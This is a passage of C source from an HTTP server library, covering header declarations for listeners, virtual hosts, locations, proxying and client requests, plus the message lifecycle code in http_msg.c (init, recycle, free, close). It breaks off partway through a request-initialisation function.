int http_mgmt_srv_init (void * vmgmt);
int http_mgmt_srv_clean(void * vmgmt);
int http_mgmt_srv_add (void * vmgmt, void * vsrv);
void * http_mgmt_srv_get (void * vmgmt, ulong srvid);
void * http_mgmt_srv_del (void * vmgmt, ulong srvid);
void * http_mgmt_srv_find (void * vmgmt, char * ip, int port);
void * http_srv_open (void * vmgmt, char * ip, int port, int ssl_link, int maxcon);
int http_srv_close(void * vsrv);
void * http_srv_connect (void * vsrv);
int http_srv_msg_send (void * vmsg);
int http_srv_msg_dns_cb (void * vmsg, char * name, int len, void * cache, int status);
int http_srv_msg_dns (void * vmsg, void * cb);
void * http_srv_ssl_ctx_get (void * vsrv, void * vcon);
int http_srv_set_active (void * vsrv, int active);
int http_srv_get_active (void * vsrv, time_t * lasttick);
int http_srv_msg_push (void * vsrv, void * vmsg);
void * http_srv_msg_pull (void * vsrv);
int http_srv_msg_num (void * vsrv);
int http_srv_con_add (void * vsrv, void * vpcon);
void * http_srv_con_del (void * vsrv, ulong conid);
int http_srv_con_num (void * vsrv);
int http_srv_lifecheck (void * vsrv);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_listen.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_LISTEN_H_
#define _HTTP_LISTEN_H_
#ifdef __cplusplus
extern "C" {
#endif
#define SERV_SERVER 1
#define SERV_UPLOAD 2
#define SERV_PROXY 4
#define SERV_FASTCGI 8
#define SERV_CALLBACK 16
#define MATCH_DEFAULT 0
#define MATCH_EXACT 1
#define MATCH_PREFIX 2
#define MATCH_REGEX_CASE 3
#define MATCH_REGEX_NOCASE 4
typedef int RequestDiag (void * vmsg);
typedef int ResponseDiag (void * vmsg);
typedef void * HTTPCBInit (void * httpmgmt, int argc, char ** argv);
typedef void HTTPCBClean (void * hcb);
typedef int HTTPCBHandler (void * cbobj, void * vmsg, char * tplfile);
typedef struct error_page {
char * err400[20]; /* 40X-400 as index */
char * err500[20]; /* 50X-500 as index */
char * root;
} ErrorPage;
typedef struct http_location {
char * path;
char root[256]; //root path
/* indicates that path is allocated and needs to be freed when cleaning up resources */
unsigned path_dup : 2;
/* 0-default loc 1-exact matching 2-prefix matching 3-regex matching case sensitive
4-regex matching ignoring case */
unsigned matchtype : 6;
/* 1-SERV_SERVER 2-SERV_UPLOAD 4-SERV_PROXY 8-SERV_FASTCGI */
unsigned type : 16; //1-server 2-upload 4-proxy 8-fastcgi 16-callback
unsigned indexnum : 8;
char * index[8];
char * passurl; //URL
uint8 cache;
char * cachefile;
arr_t * script_list;
arr_t * reply_script_list;
void * jsonobj;
HTTPCBHandler * cbfunc;
void * cbobj;
char * tplfile;
} HTTPLoc;
void * http_loc_alloc (char * path, int pathlen, uint8 pathdup, int matchtype, int servtype, char * root);
void http_loc_free (void * vloc);
int http_loc_set_root (void * vloc, char * root, int rootlen);
int http_loc_set_index (void * vloc, char ** indexlist, int num);
int http_loc_set_proxy (void * vloc, char * passurl, char * cachefile);
int http_loc_set_fastcgi (void * vloc, char * passurl);
int http_loc_cmp_path (void * vloc, void * vpath);
int http_loc_build (void * vhost, void * jhost);
typedef struct http_host {
char hostname[168];
int type; //1-server 4-proxy 8-fastcgi, to be used in future
char * passurl; //forwarding URL, to be used in future
char root[256];
uint8 gzip; //to be used in future
char * cert;
char * prikey;
char * cacert;
void * sslctx;
ErrorPage errpage;
CRITICAL_SECTION hostCS;
/* location exact match with request path by hash_table */
hashtab_t * exact_loc_table;
/* prefix matching against the request path; ploc instances are
* stored in arr_t, and matching uses the Wu-Manber algorithm */
arr_t * prefix_loc_list;
void * prefix_actrie;
/* regular expression matching against the request path; ploc instances are
* stored in arr_t, and every member is traversed when matching a path */
arr_t * regex_loc_list;
arr_t * regex_list;
HTTPLoc * uploadloc; //to be used in future
HTTPLoc * defaultloc;
arr_t * script_list;
arr_t * reply_script_list;
void * jsonobj;
/* page template parsing and substitution tables */
CRITICAL_SECTION texttplCS;
hashtab_t * texttpl_tab;
CRITICAL_SECTION listtplCS;
hashtab_t * listtpl_tab;
} HTTPHost;
void * http_host_alloc (char * hostn, int hostlen);
void http_host_free (void * vhost);
void * http_host_create (void * vhl, char * hostn, int hostlen, char * root,
char * cert, char * prikey, char * cacert);
int http_host_cmp (void * vhost, void * vname);
int http_host_build (void * vhl, void * jhl);
typedef struct http_listen {
void * res[2];
char localip[41];
int port;
uint8 forwardproxy;
uint8 ssl_link;
char * cert;
char * prikey;
char * cacert;
void * sslctx;
/* callback function from a dynamic library */
char * cblibfile;
int cbargc;
char * cbargv[16];
#ifdef UNIX
void * cbhandle;
#endif
#if defined(_WIN32) || defined(_WIN64)
HMODULE cbhandle;
#endif
HTTPCBInit * cbinit;
HTTPCBHandler * cbfunc;
HTTPCBClean * cbclean;
void * cbobj;
void * mlisten;
CRITICAL_SECTION hlCS;
hashtab_t * host_table;
HTTPHost * defaulthost;
RequestDiag * reqdiag;
void * reqdiagobj;
arr_t * script_list;
arr_t * reply_script_list;
void * jsonobj;
void * httpmgmt;
} HTTPListen;
void * http_listen_alloc (char * localip, int port, uint8 fwdpxy);
void http_listen_free (void * vhl);
int http_listen_ssl_ctx_set (void * vhl, char * cert, char * prikey, char * cacert);
void * http_listen_ssl_ctx_get (void * vhl);
void * http_listen_host_get (void * vhl, char * servname);
/* callback libfile format: /opt/app/lib/appmgmt.so app.conf */
int http_listen_cblibfile_set (void * vhl, char * cblibfile);
int http_listen_init (void * vmgmt);
int http_listen_cleanup (void * vmgmt);
void * http_listen_add (void * vmgmt, char * localip, int port, uint8 fwdpxy);
int http_listen_start_all (void * vmgmt);
void * http_ssl_listen_start (void * vmgmt, char * localip, int port, uint8 fwdpxy,
uint8 ssl, char * cert, char * prikey, char * cacert, char * libfile);
void * http_listen_start (void * vmgmt, char * localip, int port, uint8 fwdpxy, char * libfile);
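/* Illustrative usage sketch, not part of the original header. Assuming an
 * initialized HTTPMgmt instance `mgmt`, a plain and an SSL listener could be
 * started roughly as follows (certificate paths are hypothetical):
 *
 *   http_listen_start(mgmt, "0.0.0.0", 80, 0, NULL);
 *   http_ssl_listen_start(mgmt, "0.0.0.0", 443, 0, 1,
 *                         "cert/srv.crt", "cert/srv.key", NULL, NULL);
 */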
int http_listen_num (void * vmgmt);
void * http_listen_get (void * vmgmt, int index);
void * http_listen_find (void * vmgmt, char * localip, int port);
int http_listen_stop (void * vmgmt, char * localip, int port);
int http_listen_check_self (void * vmgmt, char * host, int hostlen, char * dstip, int dstport);
int http_listen_build (void * vmgmt);
void * http_host_instance (void * vmsg);
void * http_loc_instance (void * vmsg);
int http_loc_passurl_get (void * vmsg, int servtype, char * url, int urllen);
int http_real_file (void * vmsg, char * path, int len);
int http_real_path (void * vmsg, char * path, int len);
void * http_prefix_loc (void * vhl, char * hostn, int hostlen, char * matstr, int len,
char * root, void * cbfunc, void * cbobj, void * tplfile);
void * http_exact_loc (void * vhl, char * hostn, int hostlen, char * matstr, int len,
char * root, void * cbfunc, void * cbobj, void * tplfile) ;
void * http_regex_loc (void * vhl, char * hostn, int hostlen, char * matstr, int len, int ignorecase,
char * root, void * cbfunc, void * cbobj, void * tplfile);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_proxy.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_PROXY_H_
#define _HTTP_PROXY_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_proxy_handle (void * vmsg);
int http_proxy_check (void * vmsg, void * purl, int urlen);
int http_proxy_srv_send_start (void * vproxymsg);
int http_proxy_srvmsg_dns_cb (void * vproxymsg, char * name, int len, void * cache, int status);
void * http_proxy_srvmsg_open (void * vmsg, char * url, int urllen);
int http_proxy_srv_send (void * vsrvcon, void * vsrvmsg);
int http_proxy_climsg_dup (void * vsrvmsg);
int http_proxy_cli_send (void * vclicon, void * vclimsg);
int http_proxy_srvbody_del (void * vsrvcon, void * vsrvmsg);
void * http_proxy_connect_tunnel (void * vcon, void * vmsg);
int http_tunnel_srv_send (void * vclicon, void * vsrvcon);
int http_tunnel_cli_send (void * vsrvcon, void * vclicon);
int http_proxy_climsg_header (void * vclimsg);
int http_proxy_cli_cache_send (void * vclicon, void * vclimsg);
int http_proxy_srv_cache_store(void * vclicon, void * vclimsg);
void * http_proxy_srv_cache_send (void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_response.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_RESPONSE_H_
#define _HTTP_RESPONSE_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_res_getstatus (void * vmsg);
int http_res_status_decode (void * vmsg, char * pline, int linelen);
int http_res_status_encode (void * vmsg, frame_p frame);
int http_res_statusline_set (void * vmsg, char * ver, int verlen, int status, char * defreason);
int http_res_parse_header (void * vmsg, int has_statusline);
int http_res_encoding (void * vmsg);
int print_response (void * vmsg, FILE * fp);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_do.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_DO_H_
#define _HTTP_DO_H_
#ifdef __cplusplus
extern "C" {
#endif
/* auto-redirect to new Location when response status is 301/302 */
int http_redirect_request (void * vmsg);
/* send an HTTP request to the HTTP server and receive the response */
int do_http_request (void * vmsg);
void * do_http_get_msg (void * vmgmt, char * url, int urllen,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * procpara, uint64 proccbval,
char * resfile, long resoff);
void * do_http_get (void * vmgmt, char * url, int urllen,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * procpara, uint64 proccbval,
char * resfile, long resoff);
void * origin_http_get (void * vmgmt, char * url, int urllen,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * procpara, uint64 proccbval,
char * resfile, long resoff, uint64 start, uint64 size,
char * route, char * opaque);
void * do_http_post_msg (void * vmgmt, char * url, int urllen, char * mime,
char * body, int bodylen,
char * fname, long offset, long length,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * rcvpara, uint64 rcvcbval,
void * sndprocfunc, void * sndpara, uint64 sndcbval,
char * resfile, long resoff);
void * do_http_post (void * vmgmt, char * url, int urllen, char * mime,
char * body, int bodylen,
char * fname, long offset, long length,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * rcvpara, uint64 rcvcbval,
void * sndprocfunc, void * sndpara, uint64 sndcbval,
char * resfile, long resoff);
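/* Illustrative usage sketch, not part of the original header. Assuming an
 * initialized HTTPMgmt instance `mgmt` and a response callback `res_cb` with the
 * signature expected by do_http_get (not shown here), a simple asynchronous GET
 * that stores the response body into a local file could look roughly like:
 *
 *   do_http_get(mgmt, "http://www.example.com/index.html",
 *               strlen("http://www.example.com/index.html"),
 *               res_cb, NULL, NULL,        // response-complete callback
 *               NULL, NULL, 0,             // receive-progress callback (unused)
 *               "index.html", 0);          // store body to file at offset 0
 */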
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_msg.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_mgmt.h"
#include "http_header.h"
#include "http_msg.h"
#include "http_con.h"
#include "http_request.h"
#include "http_response.h"
#include "http_chunk.h"
#include "http_variable.h"
#include "http_cache.h"
#include "http_log.h"
#include "http_form.h"
#include "http_dispdir.h"
#include "http_cgi.h"
#include "http_pagetpl.h"
extern HTTPMgmt * gp_httpmgmt;
int http_msg_cmp_http_msg(void * a, void * b)
{
HTTPMsg * msga = (HTTPMsg *)a;
HTTPMsg * msgb = (HTTPMsg *)b;
if (!msga || !msgb) return -1;
if (msga->msgid == msgb->msgid) return 0;
if (msga->msgid > msgb->msgid) return 1;
return -1;
}
int http_msg_cmp_msgid (void * a, void * pat)
{
HTTPMsg * msg = (HTTPMsg *)a;
ulong msgid = *(ulong *)pat;
if (!msg) return -1;
if (msg->msgid == msgid) return 0;
if (msg->msgid > msgid) return 1;
return -1;
}
ulong http_msg_hash_msgid (void * key)
{
ulong msgid = *(ulong *)key;
return msgid;
}
int http_msg_free (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
if (!msg) return -1;
if (msg->script_var_tab) {
ht_free_all(msg->script_var_tab, var_obj_free);
msg->script_var_tab = NULL;
}
http_header_delall(msg, 0);
http_header_delall(msg, 1);
/* clear the buffer/data management resources which handle the http request */
http_uri_free(msg->uri);
http_uri_free(msg->absuri);
http_uri_free(msg->docuri);
frame_delete(&msg->req_header_stream);
frame_delete(&msg->req_body_stream);
frame_delete(&msg->req_stream);
ht_free(msg->req_header_table);
arr_free(msg->req_header_list);
msg->req_multipart = 0;
if (msg->req_file_handle) {
native_file_close(msg->req_file_handle);
msg->req_file_handle = NULL;
}
if (msg->req_file_cache && msg->req_file_name) {
unlink(msg->req_file_name);
kfree(msg->req_file_name);
msg->req_file_name = NULL;
}
msg->req_file_cache = 0;
http_req_delallcookie(msg);
ht_free(msg->req_cookie_table);
if (msg->req_chunk) {
http_chunk_free(msg->req_chunk);
msg->req_chunk = NULL;
}
if (msg->req_body_chunk) {
chunk_free(msg->req_body_chunk);
msg->req_body_chunk = NULL;
}
if (msg->req_rcvs_list) {
arr_pop_free(msg->req_rcvs_list, frame_free);
msg->req_rcvs_list = NULL;
}
if (msg->req_formlist) {
arr_pop_free(msg->req_formlist, http_form_free);
msg->req_formlist = NULL;
}
if (msg->req_form_kvobj) {
kvpair_clean(msg->req_form_kvobj);
msg->req_form_kvobj = NULL;
}
if (msg->req_form_json) {
json_clean(msg->req_form_json);
msg->req_form_json = NULL;
}
if (msg->req_query_kvobj) {
kvpair_clean(msg->req_query_kvobj);
msg->req_query_kvobj = NULL;
}
if (msg->partial_list) {
vstar_free(msg->partial_list);
msg->partial_list = NULL;
}
if (msg->fwdurl) {
kfree(msg->fwdurl);
msg->fwdurl = NULL;
}
msg->fwdurllen = 0;
/* clear the buffer/data management resources which handle the http response */
frame_delete(&msg->res_line);
frame_delete(&msg->res_header_stream);
frame_delete(&msg->res_body_stream);
frame_delete(&msg->res_stream);
if (msg->res_chunk) {
http_chunk_free(msg->res_chunk);
msg->res_chunk = NULL;
}
if (msg->res_body_chunk) {
chunk_free(msg->res_body_chunk);
msg->res_body_chunk = NULL;
}
if (msg->res_rcvs_list) {
arr_pop_free(msg->res_rcvs_list, frame_free);
msg->res_rcvs_list = NULL;
}
ht_free(msg->res_header_table);
arr_free(msg->res_header_list);
if (msg->res_file_handle) {
native_file_close(msg->res_file_handle);
msg->res_file_handle = NULL;
}
if (msg->res_file_name) {
kfree(msg->res_file_name);
msg->res_file_name = NULL;
}
if (msg->res_file_cache == 1) {
//unlink(msg->res_file_name);
}
if (msg->res_cache_info) {
cache_info_close(msg->res_cache_info);
msg->res_cache_info = NULL;
}
msg->res_file_cache = 0;
msg->res_store_file = NULL;
msg->res_store_offset = 0;
msg->res_recv_procnotify = NULL;
msg->res_recv_procnotify_para = NULL;
msg->res_recv_procnotify_cbval= 0;
msg->req_send_procnotify = NULL;
msg->req_send_procnotify_para = NULL;
msg->req_send_procnotify_cbval = 0;
kfree(msg);
return 0;
}
int http_msg_init_method (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
if (!msg) return -1;
msg->SetTearDownNotify = http_msg_set_teardown_notify;
msg->SetResponseNotify = http_msg_set_response_notify;
msg->SetResStoreFile = http_msg_set_res_store_file;
msg->SetResRecvAllNotify = http_msg_set_res_recvall_notify;
msg->SetResRecvProcNotify = http_msg_set_res_recvproc_notify;
msg->SetReqSendProcNotify = http_msg_set_req_sendproc_notify;
msg->GetMIME = http_msg_get_mime;
msg->GetMIMEMgmt = http_msg_get_mimemgmt;
msg->GetEPump = GetEPump;
msg->GetHTTPMgmt = GetHTTPMgmt;
msg->GetCBObj = http_msg_cbobj;
msg->GetMgmtObj = http_msg_mgmtobj;
msg->GetMsgObj = http_msg_obj;
msg->GetIODev = GetIODev;
msg->GetFrame = GetFrame;
msg->RecycleFrame = RecycleFrame;
msg->Fetch = http_msg_newmsg;
msg->Init = http_msg_init;
msg->InitReq = http_msg_init_req;
msg->InitRes = http_msg_init_res;
msg->Recycle = http_msg_recycle;
msg->Close = http_msg_close;
msg->CacheType = http_msg_cache_type;
msg->CacheFile = http_msg_cache_file;
msg->GetSrcIP = http_msg_srcip;
msg->GetSrcPort = http_msg_srcport;
msg->GetMsgID = http_msg_id;
msg->GetMethod = GetMethod;
msg->GetMethodInd = GetMethodInd;
msg->SetMethod = http_req_set_reqmeth;
msg->GetURL = GetURL;
msg->SetURL = http_req_set_uri;
msg->GetDocURL = GetDocURL;
msg->SetDocURL = http_req_set_docuri;
msg->GetBaseURL = GetBaseURL;
msg->GetAbsURL = GetAbsURL;
msg->GetRelativeURL = GetRelative;
msg->GetSchemeP = GetSchemeP;
msg->GetScheme = GetScheme;
msg->GetHostP = GetHostP;
msg->GetHost = GetHost;
msg->GetPort = GetPort;
msg->GetPathP = GetPathP;
msg->GetPath = GetReqPath;
msg->GetRootPath = GetRootPath;
msg->GetRealPath = GetRealPath;
msg->GetRealFile = GetRealFile;
msg->GetLocFile = GetLocFile;
msg->GetPathOnly = GetPathOnly;
msg->GetFileOnly = GetFileOnly;
msg->GetFileExt = GetFileExt;
msg->GetQueryP = GetQueryP;
msg->GetQuery = GetQuery;
msg->GetQueryValueP = GetQueryValueP;
msg->GetQueryValue = GetQueryValue;
msg->GetQueryUint = GetQueryUint;
msg->GetQueryInt = GetQueryInt;
msg->GetQueryUlong = GetQueryUlong;
msg->GetQueryLong = GetQueryLong;
msg->GetQueryInt64 = GetQueryInt64;
msg->GetQueryUint64 = GetQueryUint64;
msg->GetQueryKeyExist = GetQueryKeyExist;
msg->GetReqFormJsonValueP = GetReqFormJsonValueP;
msg->GetReqFormJsonValue = GetReqFormJsonValue;
msg->GetReqFormJsonKeyExist = GetReqFormJsonKeyExist;
msg->GetReqContentP = GetReqContentP;
msg->GetReqContent = GetReqContent;
msg->GetReqFormDecodeValue = GetReqFormDecodeValue;
msg->GetReqFormValueP = GetReqFormValueP;
msg->GetReqFormValue = GetReqFormValue;
msg->GetReqFormUint = GetReqFormUint;
msg->GetReqFormInt = GetReqFormInt;
msg->GetReqFormUlong = GetReqFormUlong;
msg->GetReqFormLong = GetReqFormLong;
msg->GetReqFormUint64 = GetReqFormUint64;
msg->GetReqFormKeyExist = GetReqFormKeyExist;
msg->GetReqHdrNum = GetReqHdrNum;
msg->GetReqHdrIndP = GetReqHdrIndP;
msg->GetReqHdrInd = GetReqHdrInd;
msg->GetReqHdrP = GetReqHdrP;
msg->GetReqHdr = GetReqHdr;
msg->GetReqHdrInt = GetReqHdrInt;
msg->GetReqHdrLong = GetReqHdrLong;
msg->GetReqHdrUlong = GetReqHdrUlong;
msg->GetReqHdrInt64 = GetReqHdrInt64;
msg->GetReqHdrUint64 = GetReqHdrUint64;
msg->GetReqContentTypeP = GetReqContentTypeP;
msg->GetReqContentType = GetReqContentType;
msg->GetReqContentLength = GetReqContentLength;
msg->GetReqEtag = GetReqEtag;
msg->GetCookieP = GetCookieP;
msg->GetCookie = GetCookie;
msg->ParseReqMultipartForm = http_form_multipart_parse;
msg->DisplayDirectory = DisplayDirectory;
msg->AddReqHdr = AddReqHdr;
msg->AddReqHdrInt = AddReqHdrInt;
msg->AddReqHdrUint32 = AddReqHdrUint32;
msg->AddReqHdrLong = AddReqHdrLong;
msg->AddReqHdrUlong = AddReqHdrUlong;
msg->AddReqHdrInt64 = AddReqHdrInt64;
msg->AddReqHdrUint64 = AddReqHdrUint64;
msg->AddReqHdrDate = AddReqHdrDate;
msg->DelReqHdr = DelReqHdr;
msg->SetReqContentType = SetReqContentType;
msg->SetReqContentLength = SetReqContentLength;
msg->SetReqContent = SetReqContent;
msg->SetReqFileContent = SetReqFileContent;
msg->AddReqContent = AddReqContent;
msg->AddReqContentPtr = AddReqContentPtr;
msg->AddReqFile = AddReqFile;
msg->AddReqAppCBContent = AddReqAppCBContent;
/* the APIs operating on the HTTP response */
msg->GetStatus = GetStatus;
msg->GetResHdrNum = GetResHdrNum;
msg->GetResHdrIndP = GetResHdrIndP;
msg->GetResHdrInd = GetResHdrInd;
msg->GetResHdrP = GetResHdrP;
msg->GetResHdr = GetResHdr;
msg->GetResHdrInt = GetResHdrInt;
msg->GetResHdrLong = GetResHdrLong;
msg->GetResHdrUlong = GetResHdrUlong;
msg->GetResHdrInt64 = GetResHdrInt64;
msg->GetResHdrUint64 = GetResHdrUint64;
msg->GetResContentTypeP = GetResContentTypeP;
msg->GetResContentType = GetResContentType;
msg->GetResContentTypeID = GetResContentTypeID;
msg->GetResContentLength = GetResContentLength;
msg->GetResContent = GetResContent;
msg->GetResContentP = GetResContentP;
msg->SetStatus = SetStatus;
msg->AddResHdr = AddResHdr;
msg->AddResHdrInt = AddResHdrInt;
msg->AddResHdrUint32 = AddResHdrUint32;
msg->AddResHdrLong = AddResHdrLong;
msg->AddResHdrUlong = AddResHdrUlong;
msg->AddResHdrInt64 = AddResHdrInt64;
msg->AddResHdrUint64 = AddResHdrUint64;
msg->AddResHdrDate = AddResHdrDate;
msg->DelResHdr = DelResHdr;
msg->SetResEtag = SetResEtag;
msg->SetCookie = SetCookie;
msg->SetResContentType = SetResContentType;
msg->SetResContentTypeID = SetResContentTypeID;
msg->SetResContentLength = SetResContentLength;
msg->Check304Resp = Check304Resp;
msg->AddResContent = AddResContent;
msg->AddResStripContent = AddResStripContent;
msg->AddResContentPtr = AddResContentPtr;
msg->AddResFile = AddResFile;
msg->AddResAppCBContent = AddResAppCBContent;
msg->AddResTpl = http_pagetpl_add;
msg->AddResTplFile = http_pagetpl_add_file;
msg->RedirectReply = RedirectReply;
msg->Reply = Reply;
msg->ReplyFeeding = ReplyFeeding;
return 0;
}
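/* reset an HTTPMsg to its initial state: clear routing, proxy and fastcgi
fields, re-initialize the request and response sides, and zero the
per-message extension area whose size is given by mgmt->msgextsize. */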
int http_msg_init (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
msg->msgtype = 0;
msg->hl = NULL;
msg->phost = NULL;
msg->ploc = NULL;
msg->locinst_times = 0;
msg->matchnum = 0;
memset(msg->matchstr, 0, sizeof(msg->matchstr));
msg->cbobj = NULL;
if (!msg->script_var_tab) {
msg->script_var_tab = ht_only_new(23, var_obj_cmp_name);
} else {
ht_free_member(msg->script_var_tab, var_obj_free);
}
msg->state = HTTP_MSG_NULL;
msg->stamp = time(&msg->createtime);
msg->ssl_link = 0;
http_msg_init_req(msg);
msg->pcon = NULL;
msg->conid = 0;
msg->workerid = 0;
msg->redirected = 0;
/* clear proxy settings */
msg->proxied = 0;
msg->cacheon = 0;
msg->proxymsg = NULL;
msg->proxy = NULL;
msg->proxyport = 0;
if (msg->fwdurl) {
kfree(msg->fwdurl);
msg->fwdurl = NULL;
}
msg->fwdurllen = 0;
/* clear fastcgi settings */
msg->fastcgi = 0;
msg->fcgimsg = NULL;
msg->fcgi_resend = 0;
msg->partial_flag = 0;
if (msg->partial_list == NULL)
msg->partial_list = vstar_new(sizeof(http_partial_t), 2, NULL);
vstar_zero(msg->partial_list);
msg->flag304 = 0;
msg->issued = 0;
http_msg_init_res(msg);
msg->resnotify = NULL;
msg->resnotify_called = 0;
msg->resnotify_para = NULL;
msg->resnotify_cbval = NULL;
msg->res_store_file = NULL;
msg->res_store_offset = 0;
msg->res_recv_procnotify = NULL;
msg->res_recv_procnotify_para = NULL;
msg->res_recv_procnotify_cbval = 0;
msg->req_send_procnotify = NULL;
msg->req_send_procnotify_para = NULL;
msg->req_send_procnotify_cbval = 0;
msg->tear_down_notify = NULL;
msg->tear_down_para = NULL;
memset(&msg->extdata[0], 0, mgmt->msgextsize);
return 0;
}
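/* return an HTTPMsg to the memory pool: fire the pending response-notify
callback if it was never invoked, detach the message from its connection,
shrink oversized reusable buffers, and hand the object back to
mgmt->msg_pool (or free it outright when no pool is available). */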
int http_msg_recycle (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
if (!msg) return -1;
msg->hl = NULL;
msg->phost = NULL;
msg->ploc = NULL;
msg->matchnum = 0;
memset(msg->matchstr, 0, sizeof(msg->matchstr));
msg->cbobj = NULL;
if (msg->script_var_tab) {
ht_free_member(msg->script_var_tab, var_obj_free);
}
if (msg->resnotify && !msg->resnotify_called) {
(*msg->resnotify)(msg, msg->resnotify_para, msg->resnotify_cbval, msg->res_status);
msg->resnotify_called = 1;
}
if (msg->pcon) {
http_con_msg_del(msg->pcon, msg);
msg->pcon = NULL;
}
//mgmt = (HTTPMgmt *)msg->httpmgmt;
mgmt = (HTTPMgmt *)gp_httpmgmt;
if (!mgmt || !mgmt->msg_pool)
return http_msg_free(msg);
msg->state = HTTP_MSG_NULL;
http_req_delallcookie(msg);
http_header_delall(msg, 0);
http_header_delall(msg, 1);
frame_empty(msg->req_header_stream);
frame_empty(msg->req_body_stream);
frame_empty(msg->req_stream);
if (frame_size(msg->req_header_stream) > REUSE_BUF_THRESHOLD / 8) //at most 8k
frame_realloc(msg->req_header_stream, REUSE_BUF_THRESHOLD / 8);
if (frame_size(msg->req_body_stream) > REUSE_BUF_THRESHOLD / 2) //32k
frame_realloc(msg->req_body_stream, REUSE_BUF_THRESHOLD / 2);
if (frame_size(msg->req_stream) > REUSE_BUF_THRESHOLD / 2) //32k
frame_realloc(msg->req_stream, REUSE_BUF_THRESHOLD / 2);
if (msg->req_file_handle) {
native_file_close(msg->req_file_handle);
msg->req_file_handle = NULL;
}
if (msg->req_file_cache && msg->req_file_name) {
unlink(msg->req_file_name);
msg->req_file_cache = 0;
kfree(msg->req_file_name);
msg->req_file_name = NULL;
}
msg->req_multipart = 0;
http_chunk_zero(msg->req_chunk);
chunk_zero(msg->req_body_chunk);
while (arr_num(msg->req_rcvs_list) > 0)
frame_free(arr_pop(msg->req_rcvs_list));
arr_zero(msg->req_rcvs_list);
while (arr_num(msg->req_formlist) > 0)
http_form_free(arr_pop(msg->req_formlist));
if (msg->req_form_kvobj) {
kvpair_clean(msg->req_form_kvobj);
msg->req_form_kvobj = NULL;
}
if (msg->req_form_json) {
json_clean(msg->req_form_json);
msg->req_form_json = NULL;
}
if (msg->req_query_kvobj) {
kvpair_clean(msg->req_query_kvobj);
msg->req_query_kvobj = NULL;
}
vstar_zero(msg->partial_list);
if (msg->fwdurl) {
kfree(msg->fwdurl);
msg->fwdurl = NULL;
}
msg->fwdurllen = 0;
/* clear the response member */
frame_empty(msg->res_header_stream);
frame_empty(msg->res_body_stream);
frame_empty(msg->res_stream);
frame_empty(msg->res_line);
if (frame_size(msg->res_header_stream) > 10240) //was REUSE_BUF_THRESHOLD/4, i.e. 16k
frame_realloc(msg->res_header_stream, 10240);
if (frame_size(msg->res_body_stream) > REUSE_BUF_THRESHOLD / 2) //32k
frame_realloc(msg->res_body_stream, REUSE_BUF_THRESHOLD / 2);
if (frame_size(msg->res_stream) > REUSE_BUF_THRESHOLD / 2) //32k
frame_realloc(msg->res_stream, REUSE_BUF_THRESHOLD / 2);
http_chunk_zero(msg->res_chunk);
chunk_zero(msg->res_body_chunk);
while (arr_num(msg->res_rcvs_list) > 0)
frame_free(arr_pop(msg->res_rcvs_list));
arr_zero(msg->res_rcvs_list);
if (msg->res_file_handle) {
native_file_close(msg->res_file_handle);
msg->res_file_handle = NULL;
}
if (msg->res_file_name) {
kfree(msg->res_file_name);
msg->res_file_name = NULL;
}
if (msg->res_file_cache == 1) {
//unlink(msg->res_file_name);
}
if (msg->res_cache_info) {
cache_info_close(msg->res_cache_info);
msg->res_cache_info = NULL;
}
msg->res_file_cache = 0;
msg->cache_req_start = 0;
msg->cache_req_off = 0;
msg->cache_req_len = -1;
//msg->msgid = 0;
/* recycle the msg to memory pool */
bpool_recycle(mgmt->msg_pool, msg);
return 0;
}
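/* close an HTTPMsg: remove it from the global message table, write the
access-log record and recycle the object. */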
int http_msg_close (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
if (!msg) return -1;
if (http_msg_mgmt_del(gp_httpmgmt, msg->msgid) != msg)
return -100;
/* write http access log to file */
http_log_write(msg);
http_msg_recycle(msg);
return 0;
}
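/* reset the request side of an HTTPMsg: source/destination addresses,
method, version, URIs, header/cookie tables and lists, streams, chunk
objects and the parsed form/query containers. */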
int http_msg_init_req (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * unit = NULL;
int i, num;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
memset(&msg->srcip, 0, sizeof(msg->srcip));
msg->srcport = 0;
memset(&msg->dstip, 0, sizeof(msg->dstip));
msg->dstport = 0;
msg->reqsent = 0;
msg->redirecttimes = 0;
msg->req_url_type = 0;
memset(msg->req_meth, 0, sizeof(msg->req_meth));
memset(msg->req_ver, 0, sizeof(msg->req_ver));
msg->req_ver_major = 0;
msg->req_ver_minor = 0;
if (!msg->uri)
msg->uri = http_uri_alloc();
else
http_uri_init(msg->uri);
if (!msg->absuri)
msg->absuri = http_uri_alloc();
else
http_uri_init(msg->absuri);
if (!msg->docuri)
